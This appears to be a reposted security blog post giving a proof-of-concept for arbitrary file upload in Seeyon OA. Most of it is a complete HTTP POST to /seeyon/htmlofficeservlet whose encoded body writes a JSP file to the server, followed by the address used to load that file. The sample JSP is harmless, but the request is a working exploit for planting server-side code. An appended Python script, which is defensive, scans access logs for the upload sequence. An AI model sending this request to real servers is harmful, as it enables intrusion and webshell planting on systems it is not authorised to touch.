
Seeyon (致远) OA arbitrary file upload

Time: 2020-12-25 11:46:31


Visit http://xxxx/seeyon/htmlofficeservlet and you will see:
[image]
POC:

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=531FF04E580BC32CDCE288A8A9E33548;
Connection: close
Content-Length: 493

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<% out.println("<h1>Hello World!</h1>");%>6e4f045d4b8506bf492ada7e3390d7ce

[image]

Visit: http://xxx/seeyon/test123456.jsp
[image]
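
A log check for the request sequence above, as an added example that is not part of the original post: it flags a client that POSTs to /seeyon/htmlofficeservlet and later receives a 200 for a JSP directly under /seeyon/. The combined log format, the sample lines and the function name are assumptions constructed for illustration.

```python
import re

# Constructed sample access-log lines (combined log format), not from a real system.
SAMPLE_LOG = """\
198.51.100.7 - - [25/Dec/2020:11:40:01 +0800] "GET /seeyon/htmlofficeservlet HTTP/1.1" 200 312
198.51.100.7 - - [25/Dec/2020:11:40:09 +0800] "POST /seeyon/htmlofficeservlet HTTP/1.1" 200 520
203.0.113.20 - - [25/Dec/2020:11:40:15 +0800] "GET /seeyon/main.do HTTP/1.1" 200 8841
198.51.100.7 - - [25/Dec/2020:11:40:21 +0800] "GET /seeyon/test123456.jsp HTTP/1.1" 200 29
203.0.113.20 - - [25/Dec/2020:11:41:02 +0800] "GET /seeyon/index.jsp HTTP/1.1" 200 1033
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
SERVLET = "/seeyon/htmlofficeservlet"
# A JSP served from directly under /seeyon/, as in the post's test123456.jsp.
JSP_RE = re.compile(r"^/seeyon/[^/?]+\.jspx?$", re.IGNORECASE)


def find_upload_chains(log_text):
    """Return one finding per JSP hit that follows a servlet POST from the same client."""
    posted = {}    # client IP -> timestamp of its first POST to the servlet
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip = m["ip"]
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if m["method"] == "POST" and path.lower() == SERVLET:
            posted.setdefault(ip, m["ts"])
        elif ip in posted and m["status"] == "200" and JSP_RE.match(path):
            findings.append({"client": ip, "post_at": posted[ip],
                             "jsp": path, "jsp_at": m["ts"]})
    return findings


if __name__ == "__main__":
    for finding in find_upload_chains(SAMPLE_LOG):
        print(finding)
```

The same-client correlation is a heuristic: a JSP requested from a different address after the POST will not match, so pair it with a check for newly created .jsp files in the web root.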


Original article: https://www.cnblogs.com/chy4412312/p/14163004.html
